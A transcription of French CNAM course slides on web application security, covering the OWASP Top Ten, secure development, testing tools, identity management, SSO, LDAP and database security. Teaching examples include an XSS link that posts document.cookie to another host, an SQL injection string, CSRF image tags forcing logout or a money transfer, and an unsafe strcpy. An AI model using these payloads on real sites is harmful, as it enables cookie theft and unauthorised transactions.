RSX112 Sécurité et réseaux

Dimension: px
Commencer à balayer dès la page:

Download "RSX112 Sécurité et réseaux"

Transcription

1 RSX112 Sécurité et réseaux Module 14 Sécurité des applications Web, annuaires, bases de données 1 CNAM /EBU

2 Sécurité des applications Web Projet OWASP (www.owasp.org) Publication de documents FAQ sur la sécurité des applications Guide de sécurisation Guide de revue de code Guide de test/audit de sécurité d applications Développement d outils Webscarab : Outil de tests de sécurité Web Webgoat : formation à la sécurité LAPSE : analyse de code Java Sprajax : tests d application AJAX 2 CNAM /EBU

3 Les dix failles majeures des applications Web Basé sur les analyses/observations de MITRE Gère la base CVE Référence toutes les failles Analyse CNAM /EBU

4 Version 2007 Evolutions 4 CNAM /EBU

5 Contenu Décrit des vulnérabilités, pas des attaques Attaques associées Attaques de Phishing : utilisent potentiellement toutes les vulnérabilités mais souvent XSS, et des faiblesses dans les vérifications d authentification ou d autorisation (A1, A4, A7, A10) Attaques sur les données personnelles : manque de validation et de contrôle des autorisations (A2, A4, A6, A7, A10) Vol d identité : Faiblesse ou absence de contrôles crypto (A8 and A9), inclusion de fichiers (A3) et faiblesse des contrôles d authentification et d autorisation (A4, A7, A10) Compromission de systèmes, modification ou desctruction de données : Injections (A2) et inclusion de fichiers à distance (A3) Pertes financières : Manque de contrôle des autorisation de transaction, et attaques CSRF (A4, A5, A7, A10) Perte de réputation : exploitation de n importe quelle vulnérabilité (A1 - A10) 5 CNAM /EBU

6 A1 Cross Site Scripting (XSS) Arrive à chaque fois qu une application utiliser des données envoyées par un utilisateur et l envoie vers un Navigateur Web sans valider ou encoder le contenu. Permet à un attaquant d exécuter des scripts sur le navigateur de l utilisateur et de mener des actions illicites (récupération de cookies, utilisation des droits de l utilisateur, installation de logiciels malicieux, ) 6 CNAM /EBU

7 Exemple 1 Response.Write("Welcome" & Request.QueryString("UserName")) 7 CNAM /EBU

8 Exemple 2 <a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id= idform > <INPUT name= cookie type= hidden > </FORM> <SCRIPT> idform.cookie.value=document.cookie; idform.submit(); </SCRIPT> > here </a> 8 CNAM /EBU

9 A2 Faille d injection Courant dans les applications Web (notamment injection SQL) Se produit quand des données envoyées par un utilisateur sont envoyées directement à un interpréteur externe, comme partie d une requête ou d une commande L attaquant envoie des données visant à faire exécuter à l interpréteur des commandes malicieuses ou à modifier des données 9 CNAM /EBU

10 Exemple injection Modèle de développement SELECT COUNT (*) FROM Users WHERE UserName= +param1+ AND Password= +param2+ Une requête normale SELECT COUNT (*) FROM Users WHERE UserName= Jeff AND Password= imbatman Une requête frauduleuse SELECT COUNT (*) FROM Users WHERE UserName= or 1=1-- AND Password= "or 1=1" toujours vrai "--" Commentaire 10 CNAM /EBU

11 Les dix failles majeures des applications Web (2/4) A3 Exécution de fichiers malicieux Autorise un attaquant à inclure des fichiers à distances Permet d introduire du code ou des données hostiles Résultat critique : serveur compromis Affecte PHP, XML et tous les frameworks qui acceptent des noms de fichiers ou des fichiers provenant des utilisateurs A4 Référence directe non sécurisée à un objet Utilisation par un développeur d une référence directe à un objet interne (fichier, enregistrement de BdD, clé, URL, ) dans une URL ou un paramètre de FORM Un attaquant peut manipuler ces références pour accéder à ces objets ou à d autres sans autorisation A5 Requête Cross Site involontaire (Cross Site Request Forgery CSRF) Oblige le navigateur d une victime connectée à envoyer une requête à une application Web vulnérable Force une action non voulue par l utilisateur Potentiellement aussi puissant que l application qu elle utilise 11 CNAM /EBU

12 Exemples de CSRF Exemple 1 Attaque typique CSRF contre un forum Re-diriger l utilisateur vers une fonction, par exemple le logout d une application Le fait de visualiser une page contenant le tag suivant génère une requête de logout <img src="http://www.example.com/logout.php"> Exemple 2 Banque en ligne qui autorise des traitements (ex. Transfert de fonds) Attaque peut inclure le tag : <img src="http://www.example.com/transfer.do?frmacct=document.form.frmacct& toacct= &toswiftid=434343&amt= "> Attaque montrée à BlackHat 2006 Possibilité de forcer un utilisateur à modifier la configuration de son routeur ADSL Utilisation de l inteface Web Utilisation du nom de compte par défaut Raisons de l attaque Intégration automatique des éléments d authentification par le navigateur (typiquement le cookie de session) Pas de nécessité pour l attaquant de fournir un login/pasword Lien fort avec XSS Possibilité de mettre le lien dans un XSS 12 CNAM /EBU

13 Les dix failles majeures des applications Web (3/4) A6 Fuite d information et mauvaise gestion des erreurs Les applications peuvent involontairement fournir des informations sur leur configuration, leur fonctionnement interne Les données personnelles ne sont pas nécessairement protégées au bon niveau Les attaquants peuvent utiliser cette faiblesse pour voler des données sensibles ou réaliser des attaques plus complexes et plus critiques A7 Authentification insuffisante ou mauvaise gestion de session Les éléments d authentification et de compte sont souvent insuffisamment protégés Idem sur les tokens de session Les attaquants peuvent découvrir des mots de passe, des clés ou des tokens d authentification ou de session et utiliser l identité du porteur légitime 13 CNAM /EBU

14 Les dix failles majeures des applications Web (4/4) A8 Stockage non sécurisé d éléments crypto Les applications utilisent rarement les fonctions crypto correctement pour protéger les données et les éléments d authentification Les attaquants peuvent utiliser ces faiblesses pour voler des identité ou commettre d autres délits comme la fraude au numéro de carte de crédit A9 Communications non sécurisées Les applications ne chiffrent pas systématiquement le trafic réseau lorsqu il est nécessaire de protéger des données ou communications sensibles A10 Mauvais contrôle d accès aux URL Fréquemment, les applications ne protègent les fonctions sensibles qu en masquant les URL correspondantes aux utilisateurs non autorisés Les attaquants peuvent utiliser cette faiblesse pour accéder directement aux URL et réaliser des actions non autorisées 14 CNAM /EBU

15 Cycle de développement d applications Spécifications fonctionnelles Architecture technique Spécifications techniques Développement Tests unitaires Tests fonctionnels Tests d intégration Tests de Pré-production Où/quand faut-il s occuper de sécurité? 15 CNAM /EBU

16 Spécifications fonctionnelles Inclure la conformité avec la politique de sécurité de la société Les spécifications fonctionnelles peuvent inclures des besoins de sécurité Protection des informations sensibles (C, I, D) Protection des fonctions sensibles (C, I, D) Authentification Contrôle d accès Journalisation Nécessite une analyse de risques pour identifier les besoins et objectifs de sécurité 16 CNAM /EBU

17 Architecture technique Doit intégrer l infrastructure dans laquelle l application va être déployée Principe de séparation réseau (utilisateurs, administration, backup, DMZ, ) Type d accès utilisateur LAN Remote Internet Nécessité d identifier les flux entre les différents composants Protection des flux si nécessaire Mise en oeuvre IDS/IPS 17 CNAM /EBU

18 Spécifications techniques Doivent intégrer des aspects sécurité Proposition de besoins minimaux Authentification Login/password obligatoire pour les fonctions sensibles SSL pour protéger le transfert de login/password Contrôle d accès Séparer les utilisateurs des administrateurs Gérer les sessions Journalisation Identifier les connexions/déconnexions Y compris les tentatives Tracer le login et IP Assurer que l application ne diminue pas le niveau de sécurité global du SI Checklists pour la configuration des serveurs OS Serveur Web Serveur BdD Utiliser les bonnes pratiques de développement Cf. top ten des risques sur les applications Web 18 CNAM /EBU

19 Développement Appliquer les meilleures pratiques Vérifier les entrées utilisateur par rapport au format attendu Protéger les données sensibles (chiffrement, signature) Vérifier que les données sensibles ne sont pas accessibles (logs, sauvegardes, ) Utiliser des jeux de tests différents de la production pour les données sensibles Analyse de code Utiliser des outils pour découvrir d éventuels trous de sécurité Solutions Mettre en œuvre SSL pour les connexions au serveur Web (http://www.openssl.org) Mettre en œuvre des firewalls applicatifs locaux (mod_security : Mettre en œuvre des appliances sécurité dédiée Web (denyall) Mettre en œuvre du SSO Utiliser des frameworks Mettre en œuvre des annuaires (http://www.openldap.org) Utiliser des certificates (X509v3) 19 CNAM /EBU

20 Règles de bon développement Se méfier des entrées utilisateur Se protéger contre les saturations/débordements de tampon Éviter les scripts inter-site N'exigez pas d'autorisations d'administrateur système (sa) Attention au code assurant des fonctions cryptographiques Réduire votre profil d'attaque Utiliser le principe du moindre privilège Faire attention aux modes de défaillance Gérer les identités et les sessions Écrire des applications que les non-administrateurs puissent réellement utiliser 20 CNAM /EBU

21 Toute saisie est source de problème Point fondamental lors de la conception Identifier au plus tôt saisie,règles de saisie Saisie et Buffer overrun dans le code C/C++ Les formes canoniques (piège dans les url) Saisie et base de données (Sql injection) Saisie sur le Web et XSS (cross scripting site) Denis de service et robustesse des codes 21 CNAM /EBU

22 Exemple de débordement de la pile Haut de la pile void UnSafe (const char* uncheckeddata) char[4] { } char localvariable[4]; int anotherlocalvariable; strcpy (localvariable, uncheckeddata); int Adresse de retour 22 CNAM /EBU

23 Débordement de segments de mémoire Remplace les données stockées dans le segment Plus difficile à exploiter qu'un débordement de mémoire tampon strcpy Données Pointeur Données xxxxxxx Données xxxxxxx Pointeur Pointeur 23 CNAM /EBU

24 Configuration Listes de vérification pour configurer correctement les différents composants logiciels Modifier les configuration par défaut, les mots de passe par défaut, Arrêter tous les services réseau non nécessaires Activer les ACL sur les machines Java pour limiter les API autorisées aux applications 24 CNAM /EBU

25 Tests Tests d intrusion et de vulnérabilités peuvent être menés dès que les différents composants de l application sont intégrés Objectif : identifier les trous de sécurité et les corriger avant le déploiement de l application Différentes approches/niveaux 1. Les testeurs ne sont pas utilisateurs de l application testées (accès via le réseau) 2. Les testeurs sont utilisateurs de l application (accès via le réseau) 3. Les testeurs sont administrateurs de l application (accès via le réseau) 4. Les testeurs sont administrateurs système/bdd (accès complet au système) 25 CNAM /EBU

26 Démarches de tests Tests d intrusion Cas 1 (distant, sans droits sur l application) Identifier les services réseau disponibles Identifier les composants logiciels et l architecture utilisée Essayer les vulnérabilités connues sur les logiciels utilisés (serveur Web, OS, BdD, ) Essayer de se connecter à travers les services réseau disponibles Cas 2 (distant, droits utilisateur) Essayer d augmenter ses droits (accès aux fonctions d administration de l application) Essayer d accéder au système Essayer d entrer des données erronées (simuler des attaques ou des erreurs) Cas 3 (distant droits administrateur) Cf. cas 2 Cas 4 (droits administrateur locaux) Vérifier si la configuration est correcte Estimer les conséquences si un attaquant obtient les droits admin 26 CNAM /EBU

27 Comment tester? Manuellement Attaquant : être humain Utilise son savoir faire Peut adapter des outils, recompiler, Avec des outils Utilisation d un outil qui génère des attaques Scanner de vulnérabilités Web Beaucoup de false positive Beaucoup de false négatives Nécessiter d utiliser beaucoup d outils 27 CNAM /EBU

28 Standardisation des tests Pas de standard pour tester une application Web Comment tester des vulnérabilités? Différents contenus peuvent être utilisés pour détecter une vulnérabilité <script>alert(document.cookie)</script ou <body onload=alert(document.cookie)>??? Faut-il tester avec 1000xA ou xA pour détecter un buffer overfow? Comment qualifier le résultat d un test? (voir l apparition d une pop-up?) S assurer que le test a un sens (script de script de script : peu de chance que ce soit réellement exécuté) Guide de test OWASP Générique Pas technique OSSTMM (Open Source Security Testing Methodology Manual) Très détaillé Plus adapté aux OS, réseau, qu aux applications Web 28 CNAM /EBU

29 Outils Open-source Gratuits Tournent souvent sur de multiples plate-forme (souvent Java/perl/ ) Pas ou peu de reporting Nécessité d être une testeur-expert sécurité pour les utiliser Exemples Oedipus Paros Burp Intruder WebScarab Fuzzer Spike E-Or 29 CNAM /EBU

30 Outils payants Chers License basée sur une application, un serveur ou une adresse IP Très bon reporting Tournent souvent sous Windows Utilisation type «suivant suivant» Nécessité d un expert en sécurité applicative et dans l outil pour des résultats optimaux Exemples Cenzic HailStorm SPIDynamics WebInspect Sanctum AppScan Acunetix NTOspider 30 CNAM /EBU

31 Gestion des identités Fournir une identification des personnes sécurisée et de confiance Permettre l intégration de contrôles d accès logiques et physiques Configurable pour s adapter aux besoins de l activité, de la réglementation ou culturels S intégrer à l annuaire d entreprise et à d autres applications : Porte monnaie électronique, gestion de droits numériques Signature numérique Permettre une gestion centralisée et simplifiée : Des identités, des permissions et des fonctions Des éléments d authentification mots de passe, cartes à puces, tokens 31 CNAM /EBU

32 Sécuriser l environnement de l Entreprise Sécurité stations Login Windows Sécurité réseaux Firewalls, VPN, Certificats, Protection Virus, Détection d intrusion, Wireless LAN Applications Serveurs Web, Bases de données, ERP, CRM, Authentification forte et SSO pour accéder à : Stations sécurisées Réseau local Réseau distant Applications d entreprise Gestion de l authentification Mot de passe PKI/SKI Carte à puce Biométrie Tokens Gestion et prévision des utilisateurs et des groupes (optionnel) Annuaire d entreprise 32 CNAM /EBU

33 Besoins d identité électronique Menace Sécurité Interne Menace Sécurité Externe Conformité Règlements Réduction de coûts 80% des incidents de sécurité ont une origine interne la perte moyenne estimée est de $110,000 par société (InterGov, org. internationale de lutte contre la cyber criminalité) Les employés mécontents ont été le plus souvent à la source des incidents internes pour 75% des réponse à une enquête du FBI (FBI and the Computer Security Institute) Absence d authentification basée sur 2 facteurs pour les accès distants ou les VPN Accès non autorisés à des locaux (aéroport, bases militaires) Accès logiques non autorisés Mots de passe aisément devinables «Social engineering» Décrets, lois et réglementation visant à protéger les données privées à travers une authentification renforcée et la journalisation : Graham-Leach- Bliley Act (GLBA) Health Insurance Portability and Accountability Act (HIPAA) Federal Information Security Mgmt. Act (FISMA) The Patriot Act Loi informatique et liberté (CNIL) La prolifération de mots de passe augmente leurs coûts de gestion La gestion des mots de passe est une des postes de coût les plus importants dans la gestion help desk La perte de productivité des utilisateurs due aux problèmes d accès liés à la possession de plusieurs mots de passe 33 CNAM /EBU

34 Problème : la prolifération des identités électroniques Prolifération des identités électroniques Des droits et matériels multiples gérés par des départements différents Demande croissante pour des accès 24/7 à l entreprise Sécurité Physique Accès distant Paie Accès Dépt Portail partenaires Accès Internet Applications internes 34 CNAM /EBU

35 Problème : systèmes multiples > coûts élevés Dilemme : Répondre aux besoins de sécurité vs. Coût et complexité Password5 Coût total de la gestion d identié Token Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Confiance (Sécurité, exploitabilité et facilité d utilisation) 35 Corporate Overview CNAM /EBU

36 Solution : la nouvelle courbe des services d identité électronique PIN Biometric Infrastructure de gestion d identité ROI de la gestion d identité Facilité d utilisation Réduction des coût (TCO) Sécurité améliorée Password5 Coût total de la gestion d identité Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Token Static Passwords Confiance (Sécurité, Exploitabilité et facilité d utilisation) 36 CNAM /EBU

37 Utilisateur nomade Sécuriser l accès à l Entreprise Connexion machine Connexion Distante Connexion Réseau Local SAP PSOFT Exchange Accès Bâtiment Main Frame Applications Entreprise Web App Web App Web App Utilisateur local 37 CNAM /EBU

38 Solutions d identité électronique Aperçu des solutions Solutions Digital ID Card Contrôle d accès par carte à puce Photo ID badge Physical Access Card Remote Access Card Secure Desktop Card Secure Sign-on Card Solutions Secure Desktop Secure Workstation Login sécurisé Verrouillage de session Services de chiffrement (Files, Disk, ) Solutions Accès distants sécurisés Enterprise RAS Dialup VPN Web Access Wireless LAN Financial RAS B2B & B2C Banking Solutions Secure Sign-On Secure Sign-on Workstation Login Network Login Application sign-on Web app sign-on Automated Password Management Plateforme de gestion des identités électroniques Card Middleware et ID Applet Suite Management matériel Management authentification Card Middleware for Windows, Mac, Linux & Unix ID Applet Suite: PIN, PKI, One-Time Password, Secure Container, Biometric Match on Card Délivrance, Gestion, Préparation des packages Devices: Smart Cards, Tokens, USB Keys Délivrance, Gestion, Préparation des packages Passwords, One-Time Passwords, Digital Certificates, Key Management, Biometrics Administration Help Desk, Self Service, Auditing & Reporting 38 CNAM /EBU

39 Décomposition fonctionnelle d IdM Objectifs et fonctions principales Enregistrement Gestion Identification Vérification Credentialing Gestion des droits Provisioning Workflow Fédération Fédération Fonctions IdM ID unique global Niveau d assurance de l identité Certificats X509, Tokens / Cards Password, Biometrie Gestion des rôles (Entitlements / Subscriptions) Gestion des accès (ACL / Rule Management) Gestion des comptes utilisateur (Login IDs) Gestion des profils Gestion et synchronisation de mots de passe Gestion des demandes Intégration d évènements Administration déléguée Auto-gestion Technologies sous-jacentes Global ID Service PKI / Kerberos Syst. à 2 facteurs Service RBAC Workflow Provisioning Meta-Annuaire Service Annuaire Application Application Conformité Authentification Autorisation Fédération Audit & Reporting Authentification utilisateurs & SSO Services d autorisation Contrôle des accès avec privilèges Journalisation et reporting Supervision sécurité Portail / Web SSO Service Plateforme Appliances AuthN Service AuthZ Service 39 CNAM /EBU

40 Évolutions des services IdM Intégration & Synchronisation Meta-annuaire, Provisioning utilisateur, EAI, WS, integration spécifique Contrôle d Accès Provisioning, modélisation RBAC, Règles de gestion Workflow Schéma d approbation, ticketing, facturation, gestion automatisée de données Complétude Value to Vision IdM Services d annuaire Stockage d identités et de profils. Stockage de données d application Services d identifiants Identifiant unique et global, outils d activation Self-Services Enregistrement, administration déléguée, gestion de profil, Organisation Services Opérationnels Standard templates, deployments, operational processes and toolset ID & PW uniques Synchronisation de login/password sur les postes de travail et Web Services fédérateurs Web services intégration via SAML, DSML, SPML, ebxml, etc. Services d authentification Authentification centralisée, cartes / tokens ID, PKI, Web- SSO Planning de mise en oeuvre 40 CNAM /EBU

41 Synthèse IdM Problèmes Conséquences Solutions Bénéfices Compte inutilisés, pas de suppression de comptes Risques de failles de sécurité, pas d imputabilité Outils de découverte et de suppression des compte inutilisés Conformité en cas d audit; amélioration de la sécurité Information utilisateur périmée; méthodes de mise à jour complexes Coûts administratifs et opérationnels ; diminution de l efficacité Règles de synchronisation des profils; interfaces de self services Information à jour ; mis à jour aisée par l utilisateur final Stratégies de password hétérogènes Coûts helpdesk élevés; faible expériences des utilisateurs Infrastructure globale de synchronisation et reset de password Réduction des coûts de helpdesk et expérience des utilisateurs Multiples processus redondants pour l ajout et le retrait de nouveaux collaborateurs Duplication de login pour un même utilisateur due à la complexité Elargir le périmètre des META systèmes au solutions de provisioning Enregistrement d un nouvel utilisateur automatisé; réduction des dépenses associées Stockages de données spécifiques; pas de partage de données Pas de mutualisation de login dans les systèmes Partage temps réel de données globales; consolidation des domaines d authentification Amélioration de l expérience de SSO; possibilité d admin. centralisée Utilisation d informations personnelles comme identifiant unique dans les systèmes Problème potentiel sur le traitement de données personnelles Intégration des contraintes réglementaires pour les identifiants uniques Non-repudiation par un individu de son login 41 CNAM /EBU

42 SSO Objectifs Idéalement Un seul mot de passe Saisi une seule fois Dans les faits Beaucoup d applications/systèmes ont leur propre mécanisme de login Réduire le nombre de login/password Réduire le risque lié aux mots de passe Un seul à retenir Plus complexe Changé plus souvent Attention à ne pas augmenter le risque! Réduction des coûts Amélioration du confort Terminologie SSO : Single Sign On (une seule authentification pour toutes les applications/systèmes) CSO : Common Sign On (authentification identique pour toutes les applications/systèmes) 42 CNAM /EBU

43 Analyse des coûts Economies Coût d un reset de password Moins de resets à faire Self service Coûts de X connexions Dépenses Coût d intégration Coût d acquisition Coût de gestion 43 CNAM /EBU

44 Risques Single Point of Failure (SPOF) Augmentation du risque d indisponibilité Point d attaque privilégié pour du DoS Vole d éléments d authentification par des implémentations nonsécurisée Projet trop ambitieux Combiner physique, réseau, systèmes, applications Procédures complexes Complexité d intégration Difficulté d intégrer l historique OS/390, AS/400, applications Client/Server, RADIUS Nécessité d intégrer les réglementations CNIL/Directive Européenne LSF SOX Santé / HIPAA CNAM /EBU

45 Catégories de SSO SSO traditionnel Synchronisation de mot de passe Serveurs d authentification Solutions de login Web 45 CNAM /EBU

46 SSO traditionnel (1/3) Permet à un utilisateur de s authentifier une seule fois Accès possible à des applications/systèmes/ multiples Peut gérer aussi du contrôle d accès et de l autorisation Quelles sont les applications autorisées Dans ces applications, quelles sont les fonctions autorisées Concept ancien Kerberos Radius 46 CNAM /EBU

47 SSO traditionnel (2/3) Fonctionnement Authentification initiale Stockage des éléments nécessaires localement Présentation de ces éléments de façon transparente aux applications/systèmes Elément unique vs éléments multiples API et DLL Nécessité d implémenter le système pour toutes les applications concernées Scripts Jouent les authentifications de façon transparente Cookie Uniquement Web 47 CNAM /EBU

48 SSO traditionnel (3/3) Avantages Simple d utilisation Réduit les coûts de support Réduit les cycles de connexion Inconvénients Intégration des applications historiques coûteuse et longue SPOF Solutions de script conduisent souvent à stocker localement les login/password sur le poste client 48 CNAM /EBU

49 CSO Synchronisation de mots de passe (1/2) Centralisation de la gestion des mots de passe Possibilité d appliquer une politique globale Propagation sur les différents systèmes autorisés pour un utilisateur donné Scripts bi-directionnels ou gestion centralisée Fonctionnement Agents locaux qui modifient les mots de passe Ou redirection de l authentification vers un serveur central 49 CNAM /EBU

50 Synchronisation de mots de passe (2/2) Avantages Un seul mot de passe à retenir Relativement simple à implémenter Reste possible par le HelpDesk sur l ensemble des systèmes depuis une seule console Possibilité d imposer une politique de mot de passe Vision centrale des autorisations Inconvénients Ne diminue pas le nombre de connexions/authentifications Ne gère que les authentifications par mot de passe 50 CNAM /EBU

51 Serveurs d authentification Passerelles frontales Gère l authentification de l utilisateur Plusieurs niveaux possibles Plusieurs types d authentification possibles (CàP, Biométrie, certificats, ) Relai ou réalisation de l authentification vers les serveurs/applications Type proxy Nécessité d une couche d authentification SPOF 51 CNAM /EBU

52 Solutions Web Login unique pour accéder à de multiples sites Deux architectures Frontal Type portail/passerelle Fonctionnement reverse-proxy Modification légère sur les applications Agent / Back office Connexion sur les serveurs Web Interrogation par les serveurs Web d un serveur central Stockage des éléments d autorisation Cookie Etat sur le serveur 52 CNAM /EBU

53 Référentiel d utilisateurs : LDAP Lightweight Directory Access Procol Déclinaison simplifiée de la norme X500 5 modèles: Modèle d information Modèle de nommage Modèle fonctionnel Modèle de sécurité Modèle de réplication 53 CNAM /EBU

54 Modèle d information Entrée = Objet Une entrée contient un ensemble d attributs (utilisateurs ou opérationnels) Classe d objet: définit les attributs que doit contenir un objet Classe abstraite, structurelle ou auxiliaire Possibilité d héritage Le schéma de l annuaire contient les classes d objets Le schéma de l annuaire permet de vérifier le respect de la syntaxe des données 54 CNAM /EBU

55 Modèle de nommage Contraintes de nommage pour garantir l interopérabilité entre annuaires DIT (directory information tree) : définit l organisation et la désignation des données Deux types d objets Nœuds Feuilles Une racine (entrée vide) Chaque entrée est identifiée de manière unique Relative Distinguished Name Distinguished Name 55 CNAM /EBU

56 Exemple de nommage 56 CNAM /EBU

57 Syntaxe structurée Définition d un schéma Chaque classe a sa propre syntaxe Définit les attributs possibles/obligatoires/ Chaque attribut a sa syntaxe Type d information Liste des valeurs possibles Possibilité de comparaison 57 CNAM /EBU

58 Modèle fonctionnel Le modèle fonctionnel décrit la manière d accéder aux données Fonctions d interrogation: search, compare Paramètres: base object, scope, derefaliases, size limit, time limit, attronly, search filter Fonctions de mise à jour: add, modify, delete, rename Fonctions de session: bind, unbind 58 CNAM /EBU

59 Modèle de sécurité Définir pour chaque utilisateur des droits d accès aux données (authentification, liste de contrôle d accès) Garantir la confidentialité des échanges (chiffrement) 59 CNAM /EBU

60 Modèle de réplication Dupliquer un annuaire sur plusieurs serveurs Prévenir les coupures réseau, les surcharges de service ou les pannes de serveur Structure maître-esclave Synchronisation totale/incrémentale Réplication en temps réel/à heure fixe 60 CNAM /EBU

61 Communication client-serveur TCP/IP : port 389 / 636 (SSL) Mécanisme de questions-réponses sous forme de messages Traitement synchrone ou asynchrone Cas asynchrone: attribution d un numéro de contexte 61 CNAM /EBU

62 OpenLDAP : Création de l arbre des données 62 CNAM /EBU

63 OpenLDAP : ajout de données 63 CNAM /EBU

64 Sécurité LDAP Protection des échanges réseau SSL Authentification SASL Plusieurs mécanismes possibles Syntaxe imposée Contrôle d accès ACL 64 CNAM /EBU

65 Exemple OpenLDAP <access> clause : [[real]self]{<level> <priv>} <level> ::= none disclose auth compare search read write <priv> ::= {= + -}{w r s c x d 0}+ 65 CNAM /EBU

66 ACL de base access to attr=userpassword by self =xw by anonymous auth access to * by self write by users read 66 CNAM /EBU

67 Sécurité des bases de données Budgets Sécurité vont d'abord à l'achat de système de sécurité (firewalls, IDS,...) à la formation à la sécurisation des applications le SGBD est le parent pauvre de la sécurité Complexité Les BD sont une affaire de spécialistes: au niveau de leur gestion : DBA au niveau de la programmation On ne peut pas sérieusement faire de l'oracle deux fois par an Quand c'est le cas, la sécurité est encore pire! 67 CNAM /EBU

68 Contraintes sur la sécurité Rôle du DBA maintenir le SGBD gérer les comptes, les applications,... pas de formation sécurité : ne peut pas «imaginer» les attaques possibles Mises à jour des systèmes d'expérience, 80% des serveurs de BD meurent avec le système et le SGBD initial: (Informix 7.2, Oracle 7.2,...) «If it works, don't fix it» Conséquence : de nombreuses failles système et applicatives ne sont JAMAIS corrigées, surtout sur les réseaux internes Criticité des applications : Arrêts impossibles La sécurité passe en dernier 68 CNAM /EBU

Sécurité des bases de données Nicolas Jombart Alain Thivillon

Sécurité des bases de données Nicolas Jombart Alain Thivillon HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité des bases de données Nicolas Jombart Alain Thivillon Place

Plus en détail

Marc OLORY IR3 INGENIEURS 2000 Université de Marne-la-Vallée. 12 décembre 2010

Marc OLORY IR3 INGENIEURS 2000 Université de Marne-la-Vallée. 12 décembre 2010 Marc OLORY IR3 INGENIEURS 2000 Université de Marne-la-Vallée 12 décembre 2010 Découvrir les services d annuaire Etudier les mécanismes LDAP Déployer un service LDAP Marc OLORY LDAP et les services d annuaire

Plus en détail

Sécurité des bases de

Sécurité des bases de HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet CLUSIR-EST Sécurité des bases de données Louis Nyffenegger Louis Nyffenegger

Plus en détail

Single Sign-On : Risques & Enjeux

Single Sign-On : Risques & Enjeux Single Sign-On : Risques & Enjeux TAM esso Tivoli Access Manager for Entreprise Single-Sign ON Charles Tostain charles.tostain@fr.ibm.com 13 Agenda Risques & Définition Tivoli Access Manager for E-SSO

Plus en détail

Gestion des identités Christian-Pierre Belin

Gestion des identités Christian-Pierre Belin Gestion des identités Christian-Pierre Belin Architecte Microsoft France La gestion des identités Le périmètre et les rôles Services d annuaire Point de stockage et d administration des comptes, des informations

Plus en détail

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.

Plus en détail

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est

Plus en détail

Enterprise Risk Management 01/12/09. Patrick CHAMBET http://www.chambet.com

Enterprise Risk Management 01/12/09. Patrick CHAMBET http://www.chambet.com Enterprise Risk Management 01/12/09 La gestion des risques de sécurité informatique De la protection du SI à la protection de l'information Patrick CHAMBET http://www.chambet.com Bouygues Telecom DSI/DGOA/SSI

Plus en détail

Bénéfices de Citrix NetScaler pour les architectures Citrix

Bénéfices de Citrix NetScaler pour les architectures Citrix Bénéfices de Citrix NetScaler pour les architectures Citrix 15 novembre 2007 Auteurs: Mahmoud EL GHOMARI E-mail: mahmoud.elghomari@eu.citrix.com Stéphane CAUNES E-mail: stephane.caunes@eu.citrix.com Riad

Plus en détail

Digital DNA Server. Serveur d authentification multi-facteurs par ADN du Numérique. L authentification de confiance

Digital DNA Server. Serveur d authentification multi-facteurs par ADN du Numérique. L authentification de confiance L authentification de confiance Digital DNA Server Serveur d authentification multifacteurs par ADN du Numérique Simplicité Rapidité Economie Liberté Evolutivité Fiabilité FR mar 205 www.loginpeople.com

Plus en détail

www.netexplorer.fr contact@netexplorer.fr

www.netexplorer.fr contact@netexplorer.fr www.netexplorer.fr 05 61 61 20 10 contact@netexplorer.fr Sommaire Sécurité applicative... 3 Authentification... 3 Chiffrement... 4 Traçabilité... 4 Audits... 5 Sécurité infrastructure... 6 Datacenters...

Plus en détail

PortWise Access Management Suite

PortWise Access Management Suite Créez un bureau virtuel pour vos employés, partenaires ou prestataires depuis n importe quel endroit et n importe quel appareil avec Portwise Access Manager et Authentication Server. Fournir des accès

Plus en détail

OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques

OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques OWASP Top Ten 2013 Les dix risques de sécurité applicatifs Web les plus critiques OSSIR Paris / 14 janvier 2014 Guillaume Lopes Consultant Sécurité Guillaume.Lopes@Intrinsec.com 14 janvier 2014 1 Qui suis-je?

Plus en détail

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES et après? 3 avril 2012 www.advens.fr Document confidentiel - Advens 2012 Etat des lieux en 2012 Augmentation de la fréquence et de la complexité des attaques

Plus en détail

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones. PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning

Plus en détail

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO)

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO) CIBLE DE SECURITE CSPN DU PRODUIT PASS (Product for Advanced SSO) Préparé pour : ANSSI Préparé par: Thales Communications & Security S.A. 4 Avenue des Louvresses 92622 GENNEVILLIERS CEDEX France This document

Plus en détail

La haute disponibilité de la CHAINE DE

